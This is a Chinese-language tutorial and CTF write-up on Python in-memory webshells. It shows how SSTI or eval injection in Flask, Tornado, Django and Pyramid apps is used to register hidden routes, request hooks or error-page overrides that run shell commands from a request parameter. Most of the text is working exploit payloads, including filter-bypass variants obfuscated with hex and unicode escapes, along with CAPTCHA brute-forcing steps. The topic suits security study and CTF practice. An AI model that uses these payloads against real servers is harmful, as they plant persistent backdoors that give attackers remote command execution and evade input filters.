python内存马学习
常用的Python
框架有Django
、Flask
, 这两者都可能存在SSTI
漏洞. Python 内存马
利用Flask
框架中SSTI
注入来实现, Flask
框架中在web
应用模板渲染的过程中用到render_template_string
进行渲染, 但未对用户传输的代码进行过滤导致用户可以通过注入恶意代码来实现Python
内存马的注入.
老版flask内存马
Flask 请求上下文管理机制
当网页请求进入Flask
时, 会实例化一个Request Context
. 在Python
中分出了两种上下文: 请求上下文(request context)、应用上下文(session context). 一个请求上下文中封装了请求的信息, 而上下文的结构是运用了一个Stack
的栈结构, 也就是说它拥有一个栈所拥有的全部特性. request context
实例化后会被push
到栈_request_ctx_stack
中, 基于此特性便可以通过获取栈顶元素的方法来获取当前的请求.
漏洞环境
flask写SSTI-demo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
from flask import Flask, request, render_template_string
app = Flask(__name__)
@app.route('/')
def hello_world(): # put application's code here
person = 'knave'
if request.args.get('name'):
person = request.args.get('name')
template = '<h1>Hi, %s.</h1>' % person
return render_template_string(template)
if __name__ == '__main__':
app.run()
|
原始Flask
内存马Payload
:
1
|
url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})
|
payload分析
1
2
3
4
5
6
7
8
9
10
11
|
url_for.__globals__['__builtins__']['eval'](
"app.add_url_rule(
'/shell',
'shell',
lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read()
)",
{
'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],
'app':url_for.__globals__['current_app']
}
)
|
url_for
是Flask
的一个内置函数, 通过Flask
内置函数可以调用其__globals__
属性, 该特殊属性能够返回函数所在模块命名空间的所有变量, 其中包含了很多已经引入的modules
, 可以看到这里是支持__builtins__
的.
在__builtins__
模块中, Python
在启动时就直接为我们导入了很多内建函数. 准确的说, Python
在启动时会首先加载内建名称空间, 内建名称空间中有许多名字到对象之间的映射, 这些名字就是内建函数的名称, 对象就是这些内建函数对象. 可以看到, 在__builtins__
模块的内建函数中是存在eval
、exec
等命令执行函数的.
由于存在命令执行函数, 因此我们就可以直接调用命令执行函数来执行危险操作, Exploit
如下:
1
|
{{url_for.__globals__['__builtins__']['eval']("__import__('os').system('open -a Calculator')")}}
|
接着再来看看app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())
这一截Payload
. 这部分是动态添加了一条路由, 而处理该路由的函数是个由lambda
关键字定义的匿名函数.
在Flask
中注册路由的时候是添加的@app.route()
装饰器来实现的, 跟进查看其源码实现, 发现其调用了add_url_rule
函数来添加路由.
lambda
即匿名函数, Payload
中add_url_rule
函数的第三个参数定义了一个lambda
匿名函数, 其中通过os
库的popen
函数执行从Web
请求中获取的cmd
参数值并返回结果, 其中该参数值默认为whoami
.
sys.modules
sys.modules是一个全局字典,该字典是python启动后就加载在内存中。每当程序员导入新的模块,sys.modules都将记录这些模块。字典sys.modules对于加载模块起到了缓冲的作用。当某个模块第一次导入,字典sys.modules将自动记录该模块。当第二次再导入该模块时,python会直接到字典中查找,从而加快了程序运行的速度。
所以我们可以通过sys.modules拿到当前已经导入的模块,并且获取模块中的属性,由于我们最终的eval是在app.py中执行的,所以我们可以通过sys.modules['__main__']
来获取当前的模块
我们需要在非debug模式下才能成功添加后门路由
1
2
3
|
import sys
sys.modules['__main__'].__dict__['app'].debug=False
sys.modules['__main__'].__dict__['app'].add_url_rule('/shell','shell',lambda :__import__('os').popen('dir').read())
|
bypass方法
url_for
可替换为get_flashed_messages
或者request.__init__
或者request.application
.
- 代码执行函数替换, 如
exec
等替换eval
.
- 字符串可采用拼接方式, 如
['__builtins__']['eval']
变为['__bui'+'ltins__']['ev'+'al']
.
__globals__
可用__getattribute__('__globa'+'ls__')
替换.
[]
可用.__getitem__()
或.pop()
替换.
- 过滤
{{
或者}}
, 可以使用{%
或者%}
绕过, {%%}
中间可以执行if
语句, 利用这一点可以进行类似盲注的操作或者外带代码执行结果.
- 过滤
_
可以用编码绕过, 如__class__
替换成\x5f\x5fclass\x5f\x5f
, 还可以用dir(0)[0][0]
或者request['args']
或者request['values']
绕过.
- 过滤了
.
可以采用attr()
或[]
绕过.
- 其它的手法参考
SSTI
绕过过滤的方法即可
1
2
3
4
|
变形payload
request.application.__self__._get_data_for_json.__getattribute__('__globa'+'ls__').__getitem__('__bui'+'ltins__').__getitem__('ex'+'ec')("app.add_url_rule('/h3rmesk1t', 'h3rmesk1t', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('shell', 'calc')).read())",{'_request_ct'+'x_stack':get_flashed_messages.__getattribute__('__globa'+'ls__').pop('_request_'+'ctx_stack'),'app':get_flashed_messages.__getattribute__('__globa'+'ls__').pop('curre'+'nt_app')})
get_flashed_messages|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fgetitem\x5f\x5f")("__builtins__")|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fgetitem\x5f\x5f")("\u0065\u0076\u0061\u006c")("app.add_ur"+"l_rule('/h3rmesk1t', 'h3rmesk1t', la"+"mbda :__imp"+"ort__('o"+"s').po"+"pen(_request_c"+"tx_stack.to"+"p.re"+"quest.args.get('shell')).re"+"ad())",{'\u005f\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u005f\u0063\u0074\u0078\u005f\u0073\u0074\u0061\u0063\u006b':get_flashed_messages|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fgetitem\x5f\x5f")("\u005f\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u005f\u0063\u0074\u0078\u005f\u0073\u0074\u0061\u0063\u006b"),'app':get_flashed_messages|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fgetitem\x5f\x5f")("\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u005f\u0061\u0070\u0070")})
|
新版flask内存马
参考:新版FLASK下python内存马的研究 - gxngxngxn - 博客园
在最新版本的Flask中,如果直接使用这个payload会发现将抛出一个异常。
但是可以利用@app.before_request
@app.after_request
方法来打
before_request
我们每次发起请求之前,就会调用这个方法,触发里面定义的函数
里面调用了
1
|
before_request_funcs.setdefault(None, []).append(f)
|
然后f就是访问值,也是我们可以自定义的,那么这里只要我们设置f为一个匿名函数,类似之前
1
|
lambda :__import__('os').popen('whoami').read()
|
payload
1
|
eval("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None,[]).append(lambda :__import__('os').popen('dir').read())")
|
after_request
这个是在请求完成后调用,需要注意的是这个是需要定义一个返回值的,不然就报错。
参考这个:Python Flask内存马的另辟途径-先知社区
self.after_request_funcs.setdefault(None, []).append(f)
传入的f就是对应的自定义函数,但这里的f需要接收一个response对象,同时返回一个response对象。
但我们仅通过lamba无法对原始传进来的response进行修改后再返回,所以需要重新生成一个response对象,然后再返回这个response。
payload
1
|
eval("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(request.args.get(\'cmd\')).read())\")==None else resp)")
|
还找到了其他钩子函数
errorhandler
这个函数可以用于自定义404页面的回显
跟进register_error_handler函数,

code_or_exception和f就是之前的那两个参数,如果我们绕过上面的register_error_handler函数,对这里的函数进行控制,一样可以达到我们的目的。
而code和f是我们比较方便可以手动构造的,但是exc_class不太好我们自己构造,我们看到这两个变量是通过_get_exc_class_and_code
函数获取的,这个函数的参数code_or_exception就是我们之前传的404,那我们就依靠这个来获取变量值,然后覆写图中这两个函数即可
payload
1
|
exec("global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__('os').popen(request.args.get('gxngxngxn')).read()")
|
前面提到新版没办法用老版的payload是会抛出错误
还是利用add_url_rule
回头看add_url_rule函数
1
2
3
4
5
6
7
8
9
10
11
12
|
rule_obj = self.url_rule_class(rule, methods=methods, **options)
rule_obj.provide_automatic_options = provide_automatic_options
self.url_map.add(rule_obj)
if view_func is not None:
old_func = self.view_functions.get(endpoint)
if old_func is not None and old_func != view_func:
raise AssertionError(
"View function mapping is overwriting an existing"
f" endpoint function: {endpoint}"
)
self.view_functions[endpoint] = view_func
|
发现在函数末尾的处理中,将 rule_obj
对象添加到了 url_map
中,之后将 view_func
作为了 view_functions
字典中 endpoint
键的值,所以理论上来讲,可以通过直接操作这两个变量来完成一次手动的 add_url_rule
url_map
和 view_functions
的定义如下:
1
2
3
4
|
url_map_class = Map
self.view_functions: dict[str, ft.RouteCallable] = {}
self.url_map = self.url_map_class(host_matching=host_matching)
|
漏洞环境
1
2
3
4
5
6
7
8
9
10
11
12
|
from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def calc():
result = eval(request.args.get('expression'))
template = '<h2>result: %s!</h2>' % result
return template
if __name__ == "__main__":
app.run(debug=True)
|
在 eval
场景下,没有办法执行多条代码,所以这里需要发送两条请求来完成操作,当前上下文中可以直接使用 app
对象,构造第一条请求向 url_map
中新增一条 UrlRule
1
|
app.url_map.add(app.url_rule_class('/flask-shell', methods=['GET'],endpoint='shell'))
|
这个时候已经可以访问 /flask-shell
路由,但是由于 view_functions
中并不存在路由指定的 endpoint
所以会报错。
之后再构造第二条请求,向 view_functions
中增加对应 endpoint
的实现。
1
|
app.view_functions.update({'shell': lambda:__import__('os').popen(request_context.top.request.args.get('cmd', 'whoami')).read()})
|
为了灵活性这里需要http传参来控制执行的命令,但是这里会发现上下文中并不存在 request_context
,当前 app
对象中的 request_context
是一个函数。
那么可以通过函数的 __globals__
属性来获取当前的全局变量字典,在这其中就有需要的 RequestContext
对象。
所以最终payload
1
|
app.view_functions.update({'shell': lambda:__import__('os').popen(app.request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami')).read()})
|
将两条payload发送完成后,即可新增一条任意命令执行的路由 /flask-shell
Tornado
参考:Python Web 内存马多框架植入技术详解 | 天工实验室
漏洞环境
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
import tornado
class MainHandler(tornado.web.RequestHandler):
def get(self):
result = eval(self.get_argument('expression'))
self.write('<h2>result: %s!</h2>' % result)
def make_app():
return tornado.web.Application([
(r"/", MainHandler),
], debug=True, autoreload=True)
if __name__ == '__main__':
app = make_app()
app.listen(5000)
print("listen: 5000")
tornado.ioloop.IOLoop.instance().start()
|
Tornado
的路由一般情况下都会在实例化 tornado.web.Application
的时候传入,最初想到的办法和 flask
相同,考虑是否能找到其中存放路由的列表来直接操作,在阅读 Application
的代码时确实发现在构造函数中存在这样的列表。
1
2
3
4
5
6
7
8
9
10
11
|
def __init__(
self,
handlers: Optional[_RuleList] = None,
default_host: Optional[str] = None,
transforms: Optional[List[Type["OutputTransform"]]] = None,
**settings: Any,
) -> None:
self.wildcard_router = _ApplicationRouter(self, handlers)
self.default_router = _ApplicationRouter(
self, [Rule(AnyMatches(), self.wildcard_router)]
)
|
发现在 Application
类中存在一个类似于 flask
中 add_url_rule
的函数 add_handlers
,这个函数用来支持配置虚拟主机,并且在之后会将指定的路由加入当前的路由表中。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
def add_handlers(self, host_pattern: str, host_handlers: _RuleList) -> None:
"""Appends the given handlers to our handler list.
Host patterns are processed sequentially in the order they were
added. All matching patterns will be considered.
"""
host_matcher = HostMatches(host_pattern)
rule = Rule(host_matcher, _ApplicationRouter(self, host_handlers))
self.default_router.rules.insert(-1, rule)
if self.default_host is not None:
self.wildcard_router.add_rules(
[(DefaultHostMatches(self, host_matcher.host_pattern), host_handlers)] )
def add_rules(self, rules: _RuleList) -> None:
"""Appends new rules to the router.
:arg rules: a list of Rule instances (or tuples of arguments, which are
passed to Rule constructor).
"""
for rule in rules:
if isinstance(rule, (tuple, list)):
assert len(rule) in (2, 3, 4)
if isinstance(rule[0], basestring_type):
rule = Rule(PathMatches(rule[0]), *rule[1:])
else:
rule = Rule(*rule)
self.rules.append(self.process_rule(rule))
|
参数构造
首先看到这个函数声明接受两个参数 host_pattern
和 host_handlers
,其中 host_pattern
是一个字符串没有什么需要多考虑的,这个场景下直接构造 .*
匹配所有域名即可,而第二个参数 host_handlers
较为复杂一点,类型为 _RuleList
,查看一下这个类型定义。
1
2
3
4
5
6
7
8
9
|
_RuleList = List[
Union[
"Rule",
List[Any], # Can't do detailed typechecking of lists.
Tuple[Union[str, "Matcher"], Any],
Tuple[Union[str, "Matcher"], Any, Dict[str, Any]],
Tuple[Union[str, "Matcher"], Any, Dict[str, Any], str],
]
]
|
在 add_rules
中,整个传入的值都会被作为构造参数来实例化一个 Rule
对象,构造函数如下:
1
2
3
4
5
6
7
|
def __init__(
self,
matcher: "Matcher",
target: Any,
target_kwargs: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
) -> None:
|
第一个参数类型为 Matcher
,如果自己来构造的话会比较麻烦,但是看到 add_rules
中的处理,会判断一次传入值,如果是 tuple
或者 list
并且第一个值是字符串,那么就会调用一次 PathMatches
返回一个 Matcher
对象,所以这里考虑直接传入路由字符串,让系统来做一次自动转换。
接下来考虑路由对应的 handler
, 这往往需要是一个 tornado.web.RequestHandler
的子类,那么这里可以直接使用 type
函数来创建一个对应基类的对象,当 type
函数接受三个参数时,第一个参数为类名,第二个参数为基类元组,第三个参数为类属性/方法的字典,函数原型如下:
1
2
|
@overload
def __init__(self, name: str, bases: tuple[type, ...], dict: dict[str, Any], /, **kwds: Any) -> None: ...
|
所以使用下面的payload即可创建一个合法 RequestHandler
。
1
2
3
4
5
6
7
|
type(
'ShellHandler',
(tornado.web.RequestHandler,),
{
'get': lambda self: self.write(__import__('os').popen(sef.get_argument('cmd', 'id')).read())
}
)
|
将所有分析结合起来,即可在当前场景下构造出下面的请求payload。
1
|
http://127.0.0.1:5000/?expression=self.application.add_handlers('.*', ['/tornado-shell', type('ShellHandler', (tornado.web.RequestHandler,), {'get': lambda self: self.write(__import__('os').popen(self.get_argument('cmd', 'id')).read())})])
|
之后便可以访问 /tornado-shell
来执行任意系统命令。
Django
漏洞代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
# memshell/urls.py
from django.contrib import admin
from django.urls import path
from .views import calc
urlpatterns = [
path('admin/', admin.site.urls),
path('calc', calc)
]
# memshell/views.py
from django.http import HttpResponse
def calc(request):
result = eval(request.GET.get('expression'))
return HttpResponse('<h2>result: %s!</h2>' % result)
|
虽然 Django
的代码结构不太相同,但由于所有路由都定义在 app/urls.py#urlpatterns
中,所以大体思路没有什么差别,首先考虑如何获取到这个列表,然后再进行操作。
在 Django
中,root app下会有一个 settings.py
文件用于定义应用配置,其中 ROOT_URLCONF
指定了当前应用路由入口,在当前场景下的 ROOT_URLCONF
为:
1
|
ROOT_URLCONF = 'memshell.urls'
|
首先考虑如何获取到 settings
这个对象,得益于当前场景下可以使用 request
,所以使用其中函数的 __globals__
属性来获取到当前的全局变量字典,其中就可以找到。
1
|
/calc?expression=request.get_post.__globals__
|
找到memshell.settings
import导入就能获取到app
1
|
/calc?expression=__import__(request.get_post.__globals__["settings"].ROOT_URLCONF)
|
获取到app就能获取urlpatterns来操作路由列表了
1
|
/calc?expression=__import__(request.get_post.__globals__["settings"].ROOT_URLCONF).urls.urlpatterns
|
在路由定义中,每一条路由都会调用 path
函数来进行定义,传入的参数相对也比较简单,就是 路由:函数
的对应,第一个路由参数不需要考虑,传入字符串即可,需要考虑的是如何构造第二个参数,查看 path
函数定义。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
def _path(route, view, kwargs=None, name=None, Pattern=None):
from django.views import View
if kwargs is not None and not isinstance(kwargs, dict):
raise TypeError(
f"kwargs argument must be a dict, but got {kwargs.__class__.__name__}."
)
if isinstance(view, (list, tuple)):
# For include(...) processing.
pattern = Pattern(route, is_endpoint=False)
urlconf_module, app_name, namespace = view
return URLResolver(
pattern,
urlconf_module,
kwargs,
app_name=app_name,
namespace=namespace,
)
elif callable(view):
pattern = Pattern(route, name=name, is_endpoint=True)
return URLPattern(pattern, view, kwargs, name)
elif isinstance(view, View):
view_cls_name = view.__class__.__name__
raise TypeError(
f"view must be a callable, pass {view_cls_name}.as_view(), not "
f"{view_cls_name}()."
)
else:
raise TypeError(
"view must be a callable or a list/tuple in the case of include()."
)
|
其中会发现 view
参数除了判断是否为 View
、(list, tuple)
之外,还判断了是否是一个可调用对象,那么这里就比较简单了,直接构造一个 lambda
函数即可。
根据之前的分析结果,可以得到下面的构造流程:
-
获取app.urlpatterns
1
|
__import__(request.get_port.__globals__["settings"].ROOT_URLCONF).urls.urlpatterns
|
-
调用path函数,返回一条新路由
1
|
__import__('django').urls.path('shell',lambda request: __import__('django').http.HttpResponse(__import__('os').popen(request.GET.get('cmd','id')).read()))
|
当前场景下需要返回一个 http.HttpResponse
,所以需要额外引入 django
来进行调用
-
将新路由append到app.urlpatterns中实现内存马
1
|
http://localhost:8000/calc?expression=__import__(request.get_port.__globals__["settings"].ROOT_URLCONF).urls.urlpatterns.append(__import__('django').urls.path('shell',lambda request: __import__('django').http.HttpResponse(__import__('os').popen(request.GET.get('cmd','id')).read())))
|
然后访问/shell
pyramid
直接上例题
第一届国城杯ez_Gallery
上来先是弱口令爆破,有验证码
下面用bp插件来爆破
xiapao
使用参考:全网最新、最详细的使用burpsuite验证码识别绕过爆破教程(2023最新)_burpsuite绕过验证码-CSDN博客
填入链接为验证码图片链接,然后开启本地验证码识别服务
然后把验证码位置替换为 @xiapao@1@
最后在把线程设为 1 就能开始爆破了
接下来就是任意文件读取
直接读app.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
|
import jinja2
from pyramid.config import Configurator
from pyramid.httpexceptions import HTTPFound
from pyramid.response import Response
from pyramid.session import SignedCookieSessionFactory
from wsgiref.simple_server import make_server
from Captcha import captcha_image_view, captcha_store
import re
import os
class User:
def __init__(self, username, password):
self.username = username
self.password = password
users = {"admin": User("admin", "123456")}
def root_view(request):
# 重定向到 /login
return HTTPFound(location='/login')
def info_view(request):
# 查看细节内容
if request.session.get('username') != 'admin':
return Response("请先登录", status=403)
file_name = request.params.get('file')
file_base, file_extension = os.path.splitext(file_name)
if file_name:
file_path = os.path.join('/app/static/details/', file_name)
try:
with open(file_path, 'r', encoding='utf-8') as f:
content = f.read()
print(content)
except FileNotFoundError:
content = "文件未找到。"
else:
content = "未提供文件名。"
return {'file_name': file_name, 'content': content, 'file_base': file_base}
def home_view(request):
# 主路由
if request.session.get('username') != 'admin':
return Response("请先登录", status=403)
detailtxt = os.listdir('/app/static/details/')
picture_list = [i[:i.index('.')] for i in detailtxt]
file_contents = {}
for picture in picture_list:
with open(f"/app/static/details/{picture}.txt", "r", encoding='utf-8') as f:
file_contents[picture] = f.read(80)
return {'picture_list': picture_list, 'file_contents': file_contents}
def login_view(request):
if request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password')
user_captcha = request.POST.get('captcha', '').upper()
if user_captcha != captcha_store.get('captcha_text', ''):
return Response("验证码错误,请重试。")
user = users.get(username)
if user and user.password == password:
request.session['username'] = username
return Response("登录成功!<a href='/home'>点击进入主页</a>")
else:
return Response("用户名或密码错误。")
return {}
def shell_view(request):
if request.session.get('username') != 'admin':
return Response("请先登录", status=403)
expression = request.GET.get('shellcmd', '')
blacklist_patterns = [r'.*length.*',r'.*count.*',r'.*[0-9].*',r'.*\..*',r'.*soft.*',r'.*%.*']
if any(re.search(pattern, expression) for pattern in blacklist_patterns):
return Response('wafwafwaf')
try:
result = jinja2.Environment(loader=jinja2.BaseLoader()).from_string(expression).render({"request": request})
if result != None:
return Response('success')
else:
return Response('error')
except Exception as e:
return Response('error')
def main():
session_factory = SignedCookieSessionFactory('secret_key')
with Configurator(session_factory=session_factory) as config:
config.include('pyramid_chameleon') # 添加渲染模板
config.add_static_view(name='static', path='/app/static')
config.set_default_permission('view') # 设置默认权限为view
# 注册路由
config.add_route('root', '/')
config.add_route('captcha', '/captcha')
config.add_route('home', '/home')
config.add_route('info', '/info')
config.add_route('login', '/login')
config.add_route('shell', '/shell')
# 注册视图
config.add_view(root_view, route_name='root')
config.add_view(captcha_image_view, route_name='captcha')
config.add_view(home_view, route_name='home', renderer='home.pt', permission='view')
config.add_view(info_view, route_name='info', renderer='details.pt', permission='view')
config.add_view(login_view, route_name='login', renderer='login.pt')
config.add_view(shell_view, route_name='shell', renderer='string', permission='view')
config.scan()
app = config.make_wsgi_app()
return app
if __name__ == "__main__":
app = main()
server = make_server('0.0.0.0', 6543, app)
server.serve_forever()
|
看到shell路由存在ssti漏洞但是无回显
添加路由视图用到 config.add_view
,我们可以查看config的所有变量
找到
1
|
'add_exception_view', 'add_forbidden_view', 'add_notfound_view'
|
但是config在main函数里面,不是全局变量没法用
pyramid钩子函数
看官方文档use hook:Using Hooks — The Pyramid Web Application Development Framework v1.4.9
发现 request 也存在钩子函数

可以利用request.add_response_callback
来构造回显
1
2
|
request.add_response_callback(lambda request, response: setattr(response, 'text',
__import__('os').popen('whoami').read()))
|
再套进 exec 方法中
1
2
3
4
5
6
|
{{cycler.__init__.__globals__.__builtins__['exec']
("request.add_response_callback(lambda request, response: setattr(response,
'text', __import__('os').popen('whoami').read()))",{'request': request})}}
{{x.__init__.__globals__.__builtins__['exec']
("request.add_response_callback(lambda request, response: setattr(response,
'text', __import__('os').popen('whoami').read()))",{'request': request})}}
|
注意最后的 {'request': request}
,声明 request,因为在 exec 的作用域中没有 request,需要进行
声明,最后得到回显进行命令执行

或者用这个request.add_finished_callback
也能打回显
这里参考:wsgiref应用无回显详细调试研究-先知社区
先调试找请求过程
1
2
3
4
5
6
7
8
|
def process_request(self, request, client_address):
"""Call finish_request.
Overridden by ForkingMixIn and ThreadingMixIn.
"""
self.finish_request(request, client_address)
self.shutdown_request(request)
|
跟进finish_request
1
2
3
|
def finish_request(self, request, client_address):
"""Finish one request by instantiating RequestHandlerClass."""
self.RequestHandlerClass(request, client_address, self)
|
跟进RequestHandlerClass
类的handler方法
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
def handle(self):
"""Handle a single HTTP request"""
self.raw_requestline = self.rfile.readline(65537)
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
self.send_error(414)
return
if not self.parse_request(): # An error code has been sent, just exit
return
handler = ServerHandler(
self.rfile, self.wfile, self.get_stderr(), self.get_environ(),
multithread=False,
)
handler.request_handler = self # backpointer for logging
handler.run(self.server.get_app())
|
跟进run方法,看到finish_reponse
,继续跟进
1
2
3
4
5
|
try:
if not self.result_is_file() or not self.sendfile():
for data in self.result:
self.write(data)
self.finish_content()
|
跟进write,把 data 写入返回的 body 中,然后调用了send_headler
,继续跟进
1
2
3
4
5
6
7
|
def send_headers(self):
"""Transmit headers to the client, via self._write()"""
self.cleanup_headers()
self.headers_sent = True
if not self.origin_server or self.client_is_modern():
self.send_preamble()
self._write(bytes(self.headers))
|
跟进send_preamble
1
2
3
4
5
6
7
8
9
10
11
12
13
|
def send_preamble(self):
"""Transmit version/status/date/server, via self._write()"""
if self.origin_server:
if self.client_is_modern():
self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
if 'Date' not in self.headers:
self._write(
('Date: %s\r\n' % format_date_time(time.time())).encode('iso-8859-1')
)
if self.server_software and 'Server' not in self.headers:
self._write(('Server: %s\r\n' % self.server_software).encode('iso-8859-1'))
else:
self._write(('Status: %s\r\n' % self.status).encode('iso-8859-1'))
|
看到最后的 header 头就是在这里进行的赋值,是每次请求进行的动态赋值,那么可以通过 ssti 将其修改为我们的回显
1
|
self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
|
可以看到 self 是
1
|
<wsgiref.simple_server.ServerHandler object at 0x00000227DAC28850>
|
先寻找对象,然后打ssti污染就行了
1
2
|
先找到wsgiref
{{lipsum.__spec__.__init__.__globals__.sys.modules}}
|
1
2
|
找到simple_server
{{lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.__dict__}}
|
1
2
|
找到handler
{{lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.ServerHandler}}
|
然后跟flask一样修改值
1
|
{{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.ServerHandler,"http_version",lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read())}}
|
或者还有其他可利用的点
刚刚的send_preamble
里面还有可以利用的
1
|
self._write(('Server: %s\r\n' % self.server_software).encode('iso-8859-1'))
|
尝试修改
1
|
{{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.ServerHandler,"server_software",lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read())}}
|
1
2
3
4
|
{{cycler.__init__.__globals__.__builtins__['setattr']
(cycler.__init__.__globals__.__builtins__.__import__('sys').modules['wsgiref'].si
mple_server.ServerHandler,'server_software',cycler.__init__.__globals__.__builtin
s__.__import__('os').popen('whoami').read())}}
|
HTTP错误回显
这里研究最近比赛中别的师傅常用的胁持错误回显界面的内存马
500状态码
当我触发时页面回显如下字段
1
|
A server error occurred. Please contact the administrator.
|
我们从源代码中搜索定位,发现是Basehandler
的一个属性error_body
注意error_body
类型是bytes
类型 ,所以我们可以对read()
返回回来的数据实现encode转换
1
2
3
|
{{lipsum['__globals__']['__builtins__']['setattr']((((lipsum|attr('__spec__'))|attr('__init__')|attr('__globals__'))['sys']|attr('modules'))['wsgiref']|attr('handlers')|attr('BaseHandler'),'error_body',lipsum['__globals__']['__builtins__']['__import__']('os')['popen']('whoami')['read']()['encode']())}}
{{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.ServerHandler,"error_body",lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read())}}
|
404状态码
根据404回显找到pyramid.httpexceptions.HTTPNotFound类
发现explanation
也是bytes
类型,污染属性explanation来404回显
1
|
{{lipsum['__globals__']['__builtins__']['exec']("setattr(Not,'explanation',shell)",{"Not":((lipsum|attr('__spec__')|attr('__init__')|attr('__globals__'))['sys']|attr('modules'))['pyramid']['httpexceptions']['HTTPNotFound'],"shell":lipsum['__globals__']['__builtins__']['__import__']('os')['popen']('whoami')['read']()})}}
|
或者
1
|
{{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.pyramid.httpexceptions.HTTPNotFound,"explanation",lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read())}}
|
也可以覆盖属性title来回显
1
|
{{(lipsum['__globals__']['__builtins__']['exec'])("setattr(Not,'title',shell)",{"Not":(((lipsum|attr('__spec__'))|attr('__init__')|attr('__globals__'))['sys']|attr('modules'))['pyramid']['httpexceptions']['HTTPNotFound'],"shell":lipsum['__globals__']['__builtins__']['__import__']('os')['popen']('whoami')['read']()})}}
|
或者
1
|
{{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.pyramid.httpexceptions.HTTPNotFound,"title",lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read())}}
|
强网杯决赛pyramid
app.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
|
from wsgiref.simple_server import make_server
from pyramid.config import Configurator
from pyramid.events import NewResponse
from pyramid.response import Response
import util
users = []
super_user = ["admin"]
default_alg = "RS"
def register_api(request):
try:
username = request.params['username']
if username in super_user:
return Response("Not Allowed!")
password = request.params['password']
except:
return Response('Please Input username & password', status="500 Internal Server")
data = {"username": username, "password": password}
users.append(data)
token = util.data_encode(data, default_alg)
return Response("Here is your token: "+ token)
def register_front(request):
return Response(util.read_html('register.html'))
def front_test(request):
return Response(util.read_html('test.html'))
def system_test(request):
try:
code = request.params['code']
token = request.params['token']
data = util.data_decode(token)
if data:
username = data['username']
print(username)
if username in super_user:
print("Welcome super_user!")
else:
return Response('Unauthorized', status="401 Unauthorized")
else:
return Response('Unauthorized', status="401 Unauthorized")
except:
return Response('Please Input code & token')
print(exec(code))
return Response("Success!")
if __name__ == '__main__':
with Configurator() as config:
config.add_route('register_front', '/')
config.add_route('register_api', '/api/register')
config.add_route('system_test', '/api/test')
config.add_route('front_test', '/test')
config.add_view(system_test, route_name='system_test')
config.add_view(front_test, route_name='front_test')
config.add_view(register_api, route_name='register_api')
config.add_view(register_front, route_name='register_front')
app = config.make_wsgi_app()
server = make_server('0.0.0.0', 6543, app)
server.serve_forever()
|
util.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
